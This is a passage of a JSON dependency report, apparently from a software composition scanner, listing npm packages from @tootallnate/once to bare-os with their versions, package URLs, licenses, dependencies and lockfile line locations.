"pkg:npm/%40tootallnate/once@1.1.2", "UID": "31254e5ee78ef763" }, "Version": "1.1.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 5268, "EndLine": 5277 } ], "AnalyzedBy": "npm" }, { "ID": "@trysound/sax@0.2.0", "Name": "@trysound/sax", "Identifier": { "PURL": "pkg:npm/%40trysound/sax@0.2.0", "UID": "e778ed1e63892fbe" }, "Version": "0.2.0", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 5278, "EndLine": 5286 } ], "AnalyzedBy": "npm" }, { "ID": "@tufjs/canonical-json@2.0.0", "Name": "@tufjs/canonical-json", "Identifier": { "PURL": "pkg:npm/%40tufjs/canonical-json@2.0.0", "UID": "7b47731df5314ce2" }, "Version": "2.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 13954, "EndLine": 13963 } ], "AnalyzedBy": "npm" }, { "ID": "@tufjs/models@4.0.0", "Name": "@tufjs/models", "Identifier": { "PURL": "pkg:npm/%40tufjs/models@4.0.0", "UID": "5ec4d7f20e3dda73" }, "Version": "4.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@tufjs/canonical-json@2.0.0", "minimatch@9.0.5" ], "Locations": [ { "StartLine": 13964, "EndLine": 13975 } ], "AnalyzedBy": "npm" }, { "ID": "@types/babel__core@7.20.5", "Name": "@types/babel__core", "Identifier": { "PURL": "pkg:npm/%40types/babel__core@7.20.5", "UID": "fde6e3c43582f638" }, "Version": "7.20.5", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/parser@7.28.4", "@babel/types@7.28.4", "@types/babel__generator@7.27.0", "@types/babel__template@7.4.4", "@types/babel__traverse@7.28.0" ], "Locations": [ { "StartLine": 5287, "EndLine": 5299 } ], "AnalyzedBy": "npm" }, { "ID": "@types/babel__generator@7.27.0", "Name": "@types/babel__generator", "Identifier": { "PURL": "pkg:npm/%40types/babel__generator@7.27.0", "UID": "9efa0a6746da26b9" }, "Version": "7.27.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/types@7.28.4" ], "Locations": [ { "StartLine": 5300, "EndLine": 5308 } ], "AnalyzedBy": "npm" }, { "ID": "@types/babel__template@7.4.4", "Name": "@types/babel__template", "Identifier": { "PURL": "pkg:npm/%40types/babel__template@7.4.4", "UID": "672a87a46045d266" }, "Version": "7.4.4", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/parser@7.28.4", "@babel/types@7.28.4" ], "Locations": [ { "StartLine": 5309, "EndLine": 5318 } ], "AnalyzedBy": "npm" }, { "ID": "@types/babel__traverse@7.28.0", "Name": "@types/babel__traverse", "Identifier": { "PURL": "pkg:npm/%40types/babel__traverse@7.28.0", "UID": "c84a63e763aceb5a" }, "Version": "7.28.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/types@7.28.4" ], "Locations": [ { "StartLine": 5319, "EndLine": 5327 } ], "AnalyzedBy": "npm" }, { "ID": "@types/geojson@7946.0.16", "Name": "@types/geojson", "Identifier": { "PURL": "pkg:npm/%40types/geojson@7946.0.16", "UID": "b63a2ed2b4df88d5" }, "Version": "7946.0.16", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 5328, "EndLine": 5333 } ], "AnalyzedBy": "npm" }, { "ID": "@types/graceful-fs@4.1.9", "Name": "@types/graceful-fs", "Identifier": { "PURL": "pkg:npm/%40types/graceful-fs@4.1.9", "UID": "10b0d82f2f946f2b" }, "Version": "4.1.9", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@types/node@24.7.0" ], "Locations": [ { "StartLine": 5334, "EndLine": 5342 } ], "AnalyzedBy": "npm" }, { "ID": "@types/hammerjs@2.0.46", "Name": "@types/hammerjs", "Identifier": { "PURL": "pkg:npm/%40types/hammerjs@2.0.46", "UID": "308ef62972cca38f" }, "Version": "2.0.46", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 5343, "EndLine": 5348 } ], "AnalyzedBy": "npm" }, { "ID": "@types/istanbul-lib-coverage@2.0.6", "Name": "@types/istanbul-lib-coverage", "Identifier": { "PURL": "pkg:npm/%40types/istanbul-lib-coverage@2.0.6", "UID": "bf022a080e3782e9" }, "Version": "2.0.6", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 5349, "EndLine": 5354 } ], "AnalyzedBy": "npm" }, { "ID": "@types/istanbul-lib-report@3.0.3", "Name": "@types/istanbul-lib-report", "Identifier": { "PURL": "pkg:npm/%40types/istanbul-lib-report@3.0.3", "UID": "fd8ceae2a9f4b873" }, "Version": "3.0.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@types/istanbul-lib-coverage@2.0.6" ], "Locations": [ { "StartLine": 5355, "EndLine": 5363 } ], "AnalyzedBy": "npm" }, { "ID": "@types/istanbul-reports@3.0.4", "Name": "@types/istanbul-reports", "Identifier": { "PURL": "pkg:npm/%40types/istanbul-reports@3.0.4", "UID": "faa519dd943aba8c" }, "Version": "3.0.4", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@types/istanbul-lib-report@3.0.3" ], "Locations": [ { "StartLine": 5364, "EndLine": 5372 } ], "AnalyzedBy": "npm" }, { "ID": "@types/minimist@1.2.5", "Name": "@types/minimist", "Identifier": { "PURL": "pkg:npm/%40types/minimist@1.2.5", "UID": "c9587108e2c34717" }, "Version": "1.2.5", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 5391, "EndLine": 5396 } ], "AnalyzedBy": "npm" }, { "ID": "@types/node@24.7.0", "Name": "@types/node", "Identifier": { "PURL": "pkg:npm/%40types/node@24.7.0", "UID": "9243479173e7c45" }, "Version": "24.7.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "undici-types@7.14.0" ], "Locations": [ { "StartLine": 5397, "EndLine": 5405 } ], "AnalyzedBy": "npm" }, { "ID": "@types/normalize-package-data@2.4.4", "Name": "@types/normalize-package-data", "Identifier": { "PURL": "pkg:npm/%40types/normalize-package-data@2.4.4", "UID": "ada19cd28471c693" }, "Version": "2.4.4", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 5406, "EndLine": 5411 } ], "AnalyzedBy": "npm" }, { "ID": "@types/stack-utils@2.0.3", "Name": "@types/stack-utils", "Identifier": { "PURL": "pkg:npm/%40types/stack-utils@2.0.3", "UID": "4804de726f12876b" }, "Version": "2.0.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 5473, "EndLine": 5478 } ], "AnalyzedBy": "npm" }, { "ID": "@types/use-sync-external-store@0.0.6", "Name": "@types/use-sync-external-store", "Identifier": { "PURL": "pkg:npm/%40types/use-sync-external-store@0.0.6", "UID": "93bae9a67858c284" }, "Version": "0.0.6", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 5479, "EndLine": 5484 } ], "AnalyzedBy": "npm" }, { "ID": "@types/yargs@17.0.33", "Name": "@types/yargs", "Identifier": { "PURL": "pkg:npm/%40types/yargs@17.0.33", "UID": "4399d0ddd011cdbd" }, "Version": "17.0.33", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@types/yargs-parser@21.0.3" ], "Locations": [ { "StartLine": 5485, "EndLine": 5493 } ], "AnalyzedBy": "npm" }, { "ID": "@types/yargs-parser@21.0.3", "Name": "@types/yargs-parser", "Identifier": { "PURL": "pkg:npm/%40types/yargs-parser@21.0.3", "UID": "666142b1c921aa5b" }, "Version": "21.0.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 5494, "EndLine": 5499 } ], "AnalyzedBy": "npm" }, { "ID": "@vscode/sudo-prompt@9.3.1", "Name": "@vscode/sudo-prompt", "Identifier": { "PURL": "pkg:npm/%40vscode/sudo-prompt@9.3.1", "UID": "ec5f560718bcdb9f" }, "Version": "9.3.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 5726, "EndLine": 5731 } ], "AnalyzedBy": "npm" }, { "ID": "@xmldom/xmldom@0.8.11", "Name": "@xmldom/xmldom", "Identifier": { "PURL": "pkg:npm/%40xmldom/xmldom@0.8.11", "UID": "f9e98e014475aea3" }, "Version": "0.8.11", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 5732, "EndLine": 5740 } ], "AnalyzedBy": "npm" }, { "ID": "abbrev@1.1.1", "Name": "abbrev", "Identifier": { "PURL": "pkg:npm/abbrev@1.1.1", "UID": "5c25c4bc283341b6" }, "Version": "1.1.1", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 5748, "EndLine": 5754 } ], "AnalyzedBy": "npm" }, { "ID": "abbrev@3.0.1", "Name": "abbrev", "Identifier": { "PURL": "pkg:npm/abbrev@3.0.1", "UID": "583427a942cc5e78" }, "Version": "3.0.1", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 13990, "EndLine": 13997 } ], "AnalyzedBy": "npm" }, { "ID": "abort-controller@3.0.0", "Name": "abort-controller", "Identifier": { "PURL": "pkg:npm/abort-controller@3.0.0", "UID": "182f694f6f8df4df" }, "Version": "3.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "event-target-shim@5.0.1" ], "Locations": [ { "StartLine": 5755, "EndLine": 5766 } ], "AnalyzedBy": "npm" }, { "ID": "accepts@1.3.8", "Name": "accepts", "Identifier": { "PURL": "pkg:npm/accepts@1.3.8", "UID": "ec798bcefa1240f6" }, "Version": "1.3.8", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "mime-types@2.1.35", "negotiator@0.6.3" ], "Locations": [ { "StartLine": 5767, "EndLine": 5779 } ], "AnalyzedBy": "npm" }, { "ID": "acorn@8.15.0", "Name": "acorn", "Identifier": { "PURL": "pkg:npm/acorn@8.15.0", "UID": "45c162e91acd0969" }, "Version": "8.15.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 5789, "EndLine": 5800 } ], "AnalyzedBy": "npm" }, { "ID": "agent-base@6.0.2", "Name": "agent-base", "Identifier": { "PURL": "pkg:npm/agent-base@6.0.2", "UID": "eae3416ea985a0c0" }, "Version": "6.0.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "debug@4.4.3" ], "Locations": [ { "StartLine": 10115, "EndLine": 10127 }, { "StartLine": 12161, "EndLine": 12173 }, { "StartLine": 19813, "EndLine": 19825 } ], "AnalyzedBy": "npm" }, { "ID": "agent-base@7.1.4", "Name": "agent-base", "Identifier": { "PURL": "pkg:npm/agent-base@7.1.4", "UID": "9b9b56f4add045c9" }, "Version": "7.1.4", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 5811, "EndLine": 5819 }, { "StartLine": 13998, "EndLine": 14007 } ], "AnalyzedBy": "npm" }, { "ID": "agentkeepalive@4.6.0", "Name": "agentkeepalive", "Identifier": { "PURL": "pkg:npm/agentkeepalive@4.6.0", "UID": "d7234690f893e99" }, "Version": "4.6.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "humanize-ms@1.2.1" ], "Locations": [ { "StartLine": 5820, "EndLine": 5832 } ], "AnalyzedBy": "npm" }, { "ID": "aggregate-error@3.1.0", "Name": "aggregate-error", "Identifier": { "PURL": "pkg:npm/aggregate-error@3.1.0", "UID": "9750f23bf4bfcf9b" }, "Version": "3.1.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "clean-stack@2.2.0", "indent-string@4.0.0" ], "Locations": [ { "StartLine": 5833, "EndLine": 5846 } ], "AnalyzedBy": "npm" }, { "ID": "anser@1.4.10", "Name": "anser", "Identifier": { "PURL": "pkg:npm/anser@1.4.10", "UID": "dabf39994dfb4833" }, "Version": "1.4.10", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 5864, "EndLine": 5869 } ], "AnalyzedBy": "npm" }, { "ID": "ansi-fragments@0.2.1", "Name": "ansi-fragments", "Identifier": { "PURL": "pkg:npm/ansi-fragments@0.2.1", "UID": "a6d4368738c84355" }, "Version": "0.2.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "colorette@1.4.0", "slice-ansi@2.1.0", "strip-ansi@5.2.0" ], "Locations": [ { "StartLine": 5899, "EndLine": 5910 } ], "AnalyzedBy": "npm" }, { "ID": "ansi-regex@2.1.1", "Name": "ansi-regex", "Identifier": { "PURL": "pkg:npm/ansi-regex@2.1.1", "UID": "9f8f87fb128e8e2b" }, "Version": "2.1.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 17311, "EndLine": 17319 } ], "AnalyzedBy": "npm" }, { "ID": "ansi-regex@4.1.1", "Name": "ansi-regex", "Identifier": { "PURL": "pkg:npm/ansi-regex@4.1.1", "UID": "669364d772672ba7" }, "Version": "4.1.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 5911, "EndLine": 5920 } ], "AnalyzedBy": "npm" }, { "ID": "ansi-regex@5.0.1", "Name": "ansi-regex", "Identifier": { "PURL": "pkg:npm/ansi-regex@5.0.1", "UID": "c14e7d7c1381d06f" }, "Version": "5.0.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 5934, "EndLine": 5942 }, { "StartLine": 14008, "EndLine": 14017 } ], "AnalyzedBy": "npm" }, { "ID": "ansi-regex@6.2.2", "Name": "ansi-regex", "Identifier": { "PURL": "pkg:npm/ansi-regex@6.2.2", "UID": "b45a5f32384c5c21" }, "Version": "6.2.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 3328, "EndLine": 3339 }, { "StartLine": 13566, "EndLine": 13578 }, { "StartLine": 15918, "EndLine": 15930 } ], "AnalyzedBy": "npm" }, { "ID": "ansi-styles@3.2.1", "Name": "ansi-styles", "Identifier": { "PURL": "pkg:npm/ansi-styles@3.2.1", "UID": "7801c6df16feeae8" }, "Version": "3.2.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "color-convert@1.9.3" ], "Locations": [ { "StartLine": 498, "EndLine": 509 }, { "StartLine": 19717, "EndLine": 19729 } ], "AnalyzedBy": "npm" }, { "ID": "ansi-styles@4.3.0", "Name": "ansi-styles", "Identifier": { "PURL": "pkg:npm/ansi-styles@4.3.0", "UID": "b0fe9d2fcc8265a1" }, "Version": "4.3.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "color-convert@2.0.1" ], "Locations": [ { "StartLine": 5943, "EndLine": 5957 }, { "StartLine": 15904, "EndLine": 15917 } ], "AnalyzedBy": "npm" }, { "ID": "ansi-styles@5.2.0", "Name": "ansi-styles", "Identifier": { "PURL": "pkg:npm/ansi-styles@5.2.0", "UID": "847b998ea56ed0c8" }, "Version": "5.2.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 16882, "EndLine": 16893 } ], "AnalyzedBy": "npm" }, { "ID": "ansi-styles@6.2.3", "Name": "ansi-styles", "Identifier": { "PURL": "pkg:npm/ansi-styles@6.2.3", "UID": "8e020ebbe998c200" }, "Version": "6.2.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 3340, "EndLine": 3351 }, { "StartLine": 14018, "EndLine": 14030 } ], "AnalyzedBy": "npm" }, { "ID": "anymatch@3.1.3", "Name": "anymatch", "Identifier": { "PURL": "pkg:npm/anymatch@3.1.3", "UID": "a55093e147f193fb" }, "Version": "3.1.3", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "normalize-path@3.0.0", "picomatch@2.3.1" ], "Locations": [ { "StartLine": 5958, "EndLine": 5970 } ], "AnalyzedBy": "npm" }, { "ID": "appdirsjs@1.2.7", "Name": "appdirsjs", "Identifier": { "PURL": "pkg:npm/appdirsjs@1.2.7", "UID": "f9c511d8970b3391" }, "Version": "1.2.7", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 5971, "EndLine": 5976 } ], "AnalyzedBy": "npm" }, { "ID": "aproba@1.2.0", "Name": "aproba", "Identifier": { "PURL": "pkg:npm/aproba@1.2.0", "UID": "8c07f2fb05d4df25" }, "Version": "1.2.0", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 5977, "EndLine": 5982 } ], "AnalyzedBy": "npm" }, { "ID": "aproba@2.1.0", "Name": "aproba", "Identifier": { "PURL": "pkg:npm/aproba@2.1.0", "UID": "3ecd1bda85a52f73" }, "Version": "2.1.0", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 14031, "EndLine": 14037 } ], "AnalyzedBy": "npm" }, { "ID": "archy@1.0.0", "Name": "archy", "Identifier": { "PURL": "pkg:npm/archy@1.0.0", "UID": "7884e64c8797969d" }, "Version": "1.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 14038, "EndLine": 14044 } ], "AnalyzedBy": "npm" }, { "ID": "are-we-there-yet@1.1.7", "Name": "are-we-there-yet", "Identifier": { "PURL": "pkg:npm/are-we-there-yet@1.1.7", "UID": "40af8b7e0f474192" }, "Version": "1.1.7", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "delegates@1.0.0", "readable-stream@2.3.8" ], "Locations": [ { "StartLine": 17320, "EndLine": 17330 } ], "AnalyzedBy": "npm" }, { "ID": "are-we-there-yet@3.0.1", "Name": "are-we-there-yet", "Identifier": { "PURL": "pkg:npm/are-we-there-yet@3.0.1", "UID": "21e275639adfa4f" }, "Version": "3.0.1", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "delegates@1.0.0", "readable-stream@3.6.2" ], "Locations": [ { "StartLine": 5983, "EndLine": 5997 } ], "AnalyzedBy": "npm" }, { "ID": "argparse@1.0.10", "Name": "argparse", "Identifier": { "PURL": "pkg:npm/argparse@1.0.10", "UID": "e23ac00b6dbad7a" }, "Version": "1.0.10", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "sprintf-js@1.0.3" ], "Locations": [ { "StartLine": 3432, "EndLine": 3440 }, { "StartLine": 12258, "EndLine": 12266 } ], "AnalyzedBy": "npm" }, { "ID": "argparse@2.0.1", "Name": "argparse", "Identifier": { "PURL": "pkg:npm/argparse@2.0.1", "UID": "823f389926343f7b" }, "Version": "2.0.1", "Licenses": [ "Python-2.0" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 5998, "EndLine": 6003 } ], "AnalyzedBy": "npm" }, { "ID": "argsarray@0.0.1", "Name": "argsarray", "Identifier": { "PURL": "pkg:npm/argsarray@0.0.1", "UID": "801ad07d74a9d000" }, "Version": "0.0.1", "Licenses": [ "WTFPL" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 6004, "EndLine": 6009 } ], "AnalyzedBy": "npm" }, { "ID": "arrify@1.0.1", "Name": "arrify", "Identifier": { "PURL": "pkg:npm/arrify@1.0.1", "UID": "c96591ffef9131e2" }, "Version": "1.0.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 6158, "EndLine": 6166 } ], "AnalyzedBy": "npm" }, { "ID": "asap@2.0.6", "Name": "asap", "Identifier": { "PURL": "pkg:npm/asap@2.0.6", "UID": "2dfc49e2aaea3bec" }, "Version": "2.0.6", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 6167, "EndLine": 6172 } ], "AnalyzedBy": "npm" }, { "ID": "astral-regex@1.0.0", "Name": "astral-regex", "Identifier": { "PURL": "pkg:npm/astral-regex@1.0.0", "UID": "30df7ba750c3e196" }, "Version": "1.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 6173, "EndLine": 6182 } ], "AnalyzedBy": "npm" }, { "ID": "async-limiter@1.0.1", "Name": "async-limiter", "Identifier": { "PURL": "pkg:npm/async-limiter@1.0.1", "UID": "695cd8aee920fd42" }, "Version": "1.0.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 6193, "EndLine": 6198 } ], "AnalyzedBy": "npm" }, { "ID": "asynckit@0.4.0", "Name": "asynckit", "Identifier": { "PURL": "pkg:npm/asynckit@0.4.0", "UID": "2a7117da72815edf" }, "Version": "0.4.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 6199, "EndLine": 6204 } ], "AnalyzedBy": "npm" }, { "ID": "available-typed-arrays@1.0.7", "Name": "available-typed-arrays", "Identifier": { "PURL": "pkg:npm/available-typed-arrays@1.0.7", "UID": "10610d8dacec4e1e" }, "Version": "1.0.7", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "possible-typed-array-names@1.1.0" ], "Locations": [ { "StartLine": 6205, "EndLine": 6219 } ], "AnalyzedBy": "npm" }, { "ID": "b4a@1.7.3", "Name": "b4a", "Identifier": { "PURL": "pkg:npm/b4a@1.7.3", "UID": "eccf7490462e9b90" }, "Version": "1.7.3", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 6231, "EndLine": 6244 } ], "AnalyzedBy": "npm" }, { "ID": "babel-jest@29.7.0", "Name": "babel-jest", "Identifier": { "PURL": "pkg:npm/babel-jest@29.7.0", "UID": "54170d61edb89808" }, "Version": "29.7.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/core@7.28.4", "@jest/transform@29.7.0", "@types/babel__core@7.20.5", "babel-plugin-istanbul@6.1.1", "babel-preset-jest@29.6.3", "chalk@4.1.2", "graceful-fs@4.2.11", "slash@3.0.0" ], "Locations": [ { "StartLine": 6245, "EndLine": 6265 } ], "AnalyzedBy": "npm" }, { "ID": "babel-plugin-istanbul@6.1.1", "Name": "babel-plugin-istanbul", "Identifier": { "PURL": "pkg:npm/babel-plugin-istanbul@6.1.1", "UID": "b28916b2b958925d" }, "Version": "6.1.1", "Licenses": [ "BSD-3-Clause" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/helper-plugin-utils@7.27.1", "@istanbuljs/load-nyc-config@1.1.0", "@istanbuljs/schema@0.1.3", "istanbul-lib-instrument@5.2.1", "test-exclude@6.0.0" ], "Locations": [ { "StartLine": 6275, "EndLine": 6290 } ], "AnalyzedBy": "npm" }, { "ID": "babel-plugin-jest-hoist@29.6.3", "Name": "babel-plugin-jest-hoist", "Identifier": { "PURL": "pkg:npm/babel-plugin-jest-hoist@29.6.3", "UID": "72d961287fa9ce28" }, "Version": "29.6.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/template@7.27.2", "@babel/types@7.28.4", "@types/babel__core@7.20.5", "@types/babel__traverse@7.28.0" ], "Locations": [ { "StartLine": 6307, "EndLine": 6321 } ], "AnalyzedBy": "npm" }, { "ID": "babel-plugin-polyfill-corejs2@0.4.14", "Name": "babel-plugin-polyfill-corejs2", "Identifier": { "PURL": "pkg:npm/babel-plugin-polyfill-corejs2@0.4.14", "UID": "48a29fa80e39fc36" }, "Version": "0.4.14", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/compat-data@7.28.4", "@babel/core@7.28.4", "@babel/helper-define-polyfill-provider@0.6.5", "semver@6.3.1" ], "Locations": [ { "StartLine": 6378, "EndLine": 6391 } ], "AnalyzedBy": "npm" }, { "ID": "babel-plugin-polyfill-corejs3@0.13.0", "Name": "babel-plugin-polyfill-corejs3", "Identifier": { "PURL": "pkg:npm/babel-plugin-polyfill-corejs3@0.13.0", "UID": "56f3bacf92c8e753" }, "Version": "0.13.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/core@7.28.4", "@babel/helper-define-polyfill-provider@0.6.5", "core-js-compat@3.45.1" ], "Locations": [ { "StartLine": 6392, "EndLine": 6404 } ], "AnalyzedBy": "npm" }, { "ID": "babel-plugin-polyfill-regenerator@0.6.5", "Name": "babel-plugin-polyfill-regenerator", "Identifier": { "PURL": "pkg:npm/babel-plugin-polyfill-regenerator@0.6.5", "UID": "531bf4d83fc78c9c" }, "Version": "0.6.5", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/core@7.28.4", "@babel/helper-define-polyfill-provider@0.6.5" ], "Locations": [ { "StartLine": 6405, "EndLine": 6416 } ], "AnalyzedBy": "npm" }, { "ID": "babel-plugin-syntax-hermes-parser@0.29.1", "Name": "babel-plugin-syntax-hermes-parser", "Identifier": { "PURL": "pkg:npm/babel-plugin-syntax-hermes-parser@0.29.1", "UID": "3142bba799d0ae27" }, "Version": "0.29.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "hermes-parser@0.29.1" ], "Locations": [ { "StartLine": 6417, "EndLine": 6425 } ], "AnalyzedBy": "npm" }, { "ID": "babel-plugin-transform-flow-enums@0.0.2", "Name": "babel-plugin-transform-flow-enums", "Identifier": { "PURL": "pkg:npm/babel-plugin-transform-flow-enums@0.0.2", "UID": "59002848b8530a21" }, "Version": "0.0.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/plugin-syntax-flow@7.27.1" ], "Locations": [ { "StartLine": 6426, "EndLine": 6434 } ], "AnalyzedBy": "npm" }, { "ID": "babel-preset-current-node-syntax@1.2.0", "Name": "babel-preset-current-node-syntax", "Identifier": { "PURL": "pkg:npm/babel-preset-current-node-syntax@1.2.0", "UID": "d8593e9f71cb832f" }, "Version": "1.2.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/core@7.28.4", "@babel/plugin-syntax-async-generators@7.8.4", "@babel/plugin-syntax-bigint@7.8.3", "@babel/plugin-syntax-class-properties@7.12.13", "@babel/plugin-syntax-class-static-block@7.14.5", "@babel/plugin-syntax-import-attributes@7.27.1", "@babel/plugin-syntax-import-meta@7.10.4", "@babel/plugin-syntax-json-strings@7.8.3", "@babel/plugin-syntax-logical-assignment-operators@7.10.4", "@babel/plugin-syntax-nullish-coalescing-operator@7.8.3", "@babel/plugin-syntax-numeric-separator@7.10.4", "@babel/plugin-syntax-object-rest-spread@7.8.3", "@babel/plugin-syntax-optional-catch-binding@7.8.3", "@babel/plugin-syntax-optional-chaining@7.8.3", "@babel/plugin-syntax-private-property-in-object@7.14.5", "@babel/plugin-syntax-top-level-await@7.14.5" ], "Locations": [ { "StartLine": 6435, "EndLine": 6460 } ], "AnalyzedBy": "npm" }, { "ID": "babel-preset-jest@29.6.3", "Name": "babel-preset-jest", "Identifier": { "PURL": "pkg:npm/babel-preset-jest@29.6.3", "UID": "8b78b89784a1f2cd" }, "Version": "29.6.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/core@7.28.4", "babel-plugin-jest-hoist@29.6.3", "babel-preset-current-node-syntax@1.2.0" ], "Locations": [ { "StartLine": 6461, "EndLine": 6476 } ], "AnalyzedBy": "npm" }, { "ID": "balanced-match@1.0.2", "Name": "balanced-match", "Identifier": { "PURL": "pkg:npm/balanced-match@1.0.2", "UID": "f9cc37abb6c3bcd3" }, "Version": "1.0.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 6477, "EndLine": 6482 }, { "StartLine": 14045, "EndLine": 14051 } ], "AnalyzedBy": "npm" }, { "ID": "bare-events@2.7.0", "Name": "bare-events", "Identifier": { "PURL": "pkg:npm/bare-events@2.7.0", "UID": "e037ce945c76a08b" }, "Version": "2.7.0", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 6483, "EndLine": 6488 } ], "AnalyzedBy": "npm" }, { "ID": "bare-fs@4.4.5", "Name": "bare-fs", "Identifier": { "PURL": "pkg:npm/bare-fs@4.4.5", "UID": "5a5c32c1e3e5774d" }, "Version": "4.4.5", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "bare-events@2.7.0", "bare-path@3.0.0", "bare-stream@2.7.0", "bare-url@2.2.2", "fast-fifo@1.3.2" ], "Locations": [ { "StartLine": 6489, "EndLine": 6513 } ], "AnalyzedBy": "npm" }, { "ID": "bare-os@3.6.2", "Name": "bare-os", "Identifier": { "PURL": "pkg:npm/bare-os@3.6.2", "UID": "21fcff5a0651f1fb" }, "Version": "3.6.2", "Licenses": [ 